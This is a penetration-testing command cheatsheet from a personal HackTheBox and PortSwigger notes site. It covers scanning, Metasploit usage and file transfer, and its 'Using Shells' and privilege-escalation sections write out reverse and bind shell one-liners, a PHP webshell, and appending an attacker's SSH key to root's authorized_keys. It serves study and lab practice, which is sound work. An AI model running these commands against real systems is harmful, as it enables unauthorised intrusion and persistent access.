âŗ
Ichyaboy
  • 👋Ichyaboy
  • Hackthebox Related
    • 🎰Machines
      • Linux based Machines
        • Talkative
        • Encoding
      • Windows based machines
        • Silo
    • 🕹ī¸Challenges (coming soon)
  • Portswigger Related
    • 🔧Server-side topics
      • Business logic flaws
        • Excessive trust in client-side controls
        • 2FA Broken Logic
        • High-level logic vulnerability
        • Inconsistent handling of exceptional input
        • Inconsistent security controls
        • Weak isolation on dual-use endpoint
        • Low-level logic flaw
        • Infinite money logic flaw
      • Information Disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
      • Access Control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User role can be modified in user profile
        • User ID controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with data leakage in redirect
        • User ID controlled by request parameter with password disclosure
        • Insecure direct object references
        • URL-based access control can be circumvented
        • Method-based access control can be circumvented
        • Multi-step process with no access control on one step
        • Referer-based access control
      • File Upload
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
        • Web shell upload via path traversal
        • Web shell upload via extension blacklist bypass
        • Web shell upload via obfuscated file extension
        • Remote code execution via polyglot web shell upload
        • Web shell upload via race condition
      • Race Conditions
        • Limit overrun race conditions
        • Bypassing rate limits via race conditions
        • Multi endpoint race conditions
        • Single endpoint race conditions
        • Time sensitive vulnerabilities
        • Partial construction race conditions
      • SSRF
        • Basic SSRF against the local server
        • Basic SSRF against another back end system
        • Blind SSRF with out of band detection
        • SSRF with blacklist based input filter
        • SSRF with filter bypass via open redirection vulnerability
        • Blind SSRF with Shellshock exploitation
        • SSRF with whitelist based input filter
      • XXE Injection
        • Exploiting XXE using external entities to retrieve files
        • Exploiting XXE to perform SSRF attacks
        • Blind XXE with out of band interaction
        • Blind XXE with out of band interaction via XML parameter entities
        • Exploiting blind XXE to exfiltrate data using a malicious external DTD
        • Exploiting blind XXE to retrieve data via error messages
        • Exploiting XInclude to retrieve files
        • Exploiting XXE via image file upload
        • Exploiting XXE to retrieve data by repurposing a local DTD
      • Nosql Injection
        • Detecting NoSQL injection
        • Exploiting NoSQL operator injection to bypass authentication
        • Exploiting NoSQL injection to extract data
        • Exploiting NoSQL operator injection to extract unknown fields
      • Api Testing
        • Exploiting an API endpoint using documentation
        • Exploiting server side parameter pollution in a query string
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
        • Exploiting server side parameter pollution in a REST URL
    • đŸŽ¯Client-side topics
      • Cross-site scripting (XSS)
        • Stored XSS
          • Stored XSS into HTML context with nothing encoded
          • Stored XSS into anchor href attribute with double quotes HTML encoded
          • Stored XSS into onclick event with angle brackets and double quotes HTML encoded and single quotes and backslash escaped
        • Reflected XSS
          • Reflected XSS into HTML context with nothing encoded
          • Reflected XSS into attribute with angle brackets HTML encoded
          • Reflected XSS into a JavaScript string with angle brackets HTML encoded
          • Reflected XSS into HTML context with most tags and attributes blocked
          • Reflected XSS into HTML context with all tags blocked except custom ones
          • Reflected XSS with some SVG markup allowed
          • Reflected XSS in canonical link tag
          • Reflected XSS into a JavaScript string with single quote and backslash escaped
          • Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped
          • Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped
          • Reflected XSS with event handlers and href attributes blocked
          • Reflected XSS in a JavaScript URL with some characters blocked
        • DOM-based XSS
          • DOM XSS in document.write sink using source location.search
          • DOM XSS in innerHTML sink using source location.search
          • DOM XSS in jQuery anchor href attribute sink using location.search source
          • DOM XSS in jQuery selector sink using a hashchange event
          • DOM XSS in document.write sink using source location.search inside a select element
          • DOM XSS in AngularJS expression with angle brackets and double quotes HTML encoded
          • Reflected DOM XSS
          • Stored DOM XSS
        • CSP Bypass
          • Reflected XSS protected by CSP, with CSP bypass
          • Reflected XSS protected by very strict CSP, with dangling markup attack
        • Client-side template injection
          • Reflected XSS with AngularJS sandbox escape without strings
          • Reflected XSS with AngularJS sandbox escape and CSP
        • Common XSS Attacks
          • Exploiting cross site scripting to steal cookies
          • Exploiting cross site scripting to capture passwords
          • Exploiting XSS to perform CSRF
      • WebSockets
        • Manipulating WebSocket messages to exploit vulnerabilities
        • Cross site WebSocket hijacking
        • Manipulating the WebSocket handshake to exploit vulnerabilities
      • Cross-site Request forgery (CSRF)
        • CSRF vulnerability with no defenses
        • CSRF where token validation depends on request method
        • CSRF where token validation depends on token being present
        • CSRF where token is not tied to user session
        • CSRF where token is tied to non session cookie
        • CSRF where token is duplicated in cookie
        • SameSite Lax bypass via method override
        • SameSite Strict bypass via client side redirect
        • SameSite Strict bypass via sibling domain
        • SameSite Lax bypass via cookie refresh
        • CSRF where Referer validation depends on header being present
        • CSRF with broken Referer validation
      • Cross-origin resource sharing
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Clickjacking
        • Basic clickjacking with CSRF token protection
        • Clickjacking with form input data prefilled from a URL parameter
        • Clickjacking with a frame buster script
        • Exploiting clickjacking vulnerability to trigger DOM based XSS
        • Multistep clickjacking
      • DOM-based vulnerabilities
        • DOM XSS using web messages
        • DOM XSS using web messages and a JavaScript URL
        • DOM XSS using web messages and JSON.parse
        • DOM based open redirection
        • DOM based cookie manipulation
        • Exploiting DOM clobbering to enable XSS
        • Clobbering DOM attributes to bypass HTML filters
  • Resources
    • đŸŗī¸Cheatsheets
      • Basic Tools
      • Footprinting
      • Web Inofrmation Gathering
      • Nmap
      • File Transfer
      • Passwords Attacks
      • USING THE METASPLOIT FRAMEWORK
      • Shells & Payloads
      • Attacking Common Services
      • Pivoting, Tunneling, and Port Forwarding
    • 🏴Useful Scripts
      • NoSQL REGEX Password Length
      • NoSQL REGEX Password
      • Creds BruteForce CSRF Handling
Powered by GitBook
On this page
  • Basic Tools
  • General
  • FTP
  • TMUX
  • VIM
  • Pentesting
  • Web Enumeration
  • Public Exploits
  • Using Shells
  • Privilege Escalation
  • Transferring Files
  1. Resources
  2. Cheatsheets

Basic Tools

Basic Tools

General

Command

Description

sudo openvpn user.ovpn

Connect to VPN

ifconfig/ip a

Show our IP address

netstat -rn

Show networks accessible via the VPN

ssh user@10.10.10.10

SSH to a remote server

ftp 10.129.42.253

FTP to a remote server

FTP

Command

Description

ftp <FQDN/IP>

Interact with the FTP service on the target.

nc -nv <FQDN/IP> 21

Interact with the FTP service on the target.

telnet <FQDN/IP> 21

Interact with the FTP service on the target.

openssl s_client -connect <FQDN/IP>:21 -starttls ftp

Interact with the FTP service on the target using encrypted connection.

wget -m --no-passive ftp://anonymous:anonymous@<target>

Download all available files on the target FTP server.

TMUX

Command

Description

tmux

Start tmux

ctrl+b

tmux: default prefix

prefix c

tmux: new window

prefix 1

tmux: switch to window (1)

prefix shift+%

tmux: split pane vertically

prefix shift+"

tmux: split pane horizontally

prefix ->

tmux: switch to the right pane

VIM

Command

Description

vim file

vim: open file with vim

esc+i

vim: enter insert mode

esc

vim: back to normal mode

x

vim: Cut character

dw

vim: Cut word

dd

vim: Cut full line

yw

vim: Copy word

yy

vim: Copy full line

p

vim: Paste

:1

vim: Go to line number 1.

:w

vim: Write the file 'i.e. save'

:q

vim: Quit

:q!

vim: Quit without saving

:wq

vim: Write and quit

Pentesting

Command

Description

Service Scanning

nmap 10.129.42.253

Run nmap on an IP

nmap -sV -sC -p- 10.129.42.253

Run an nmap script scan on an IP

locate scripts/citrix

List various available nmap scripts

nmap --script smb-os-discovery.nse -p445 10.10.10.40

Run an nmap script on an IP

netcat 10.10.10.10 22

Grab banner of an open port

smbclient -N -L \\\\10.129.42.253

List SMB Shares

smbclient \\\\10.129.42.253\\users

Connect to an SMB share

snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

Scan SNMP on an IP

onesixtyone -c dict.txt 10.129.42.254

Brute force SNMP secret string

Web Enumeration

Command

Description

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

Run a directory scan on a website

gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

Run a sub-domain scan on a website

curl -IL https://www.inlanefreight.com

Grab website banner

whatweb 10.10.10.121

List details about the webserver/certificates

curl 10.10.10.121/robots.txt

List potential directories in robots.txt

ctrl+U

View page source (in Firefox)

Public Exploits

Command

Description

searchsploit openssh 7.2

Search for public exploits for a web application

msfconsole

MSF: Start the Metasploit Framework

search exploit eternalblue

MSF: Search for public exploits in MSF

use exploit/windows/smb/ms17_010_psexec

MSF: Start using an MSF module

show options

MSF: Show required options for an MSF module

set RHOSTS 10.10.10.40

MSF: Set a value for an MSF module option

check

MSF: Test if the target server is vulnerable

exploit

MSF: Run the exploit on the target server is vulnerable

Using Shells

Command

Description

nc -lvnp 1234

Start a nc listener on a local port

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

Send a reverse shell from the remote server

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Another command to send a reverse shell from the remote server

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Start a bind shell on the remote server

nc 10.10.10.1 1234

Connect to a bind shell started on the remote server

python -c 'import pty; pty.spawn("/bin/bash")'

Upgrade shell TTY (1)

ctrl+z then stty raw -echo then fg then enter twice

Upgrade shell TTY (2)

echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php

Create a webshell php file

curl http://SERVER_IP:PORT/shell.php?cmd=id

Execute a command on an uploaded webshell

Privilege Escalation

Command

Description

./linpeas.sh

Run linpeas script to enumerate remote server

sudo -l

List available sudo privileges

sudo -u user /bin/echo Hello World!

Run a command with sudo

sudo su -

Switch to root user (if we have access to sudo su)

sudo su user -

Switch to a user (if we have access to sudo su)

ssh-keygen -f key

Create a new SSH key

echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

Add the generated public key to the user

ssh root@10.10.10.10 -i key

SSH to the server with the generated private key

Transferring Files

Command

Description

python3 -m http.server 8000

Start a local webserver

wget http://10.10.14.1:8000/linpeas.sh

Download a file on the remote server from our local machine

curl http://10.10.14.1:8000/linenum.sh -o linenum.sh

Download a file on the remote server from our local machine

scp linenum.sh user@remotehost:/tmp/linenum.sh

Transfer a file to the remote server with scp (requires SSH access)

base64 shell -w 0

Convert a file to base64

echo f0VMR...SNIO...InmDwU | base64 -d > shell

Convert a file from base64 back to its orig

md5sum shell

Check the file's md5sum to ensure it converted correctly

PreviousCheatsheetsNextFootprinting

Last updated 1 year ago

đŸŗī¸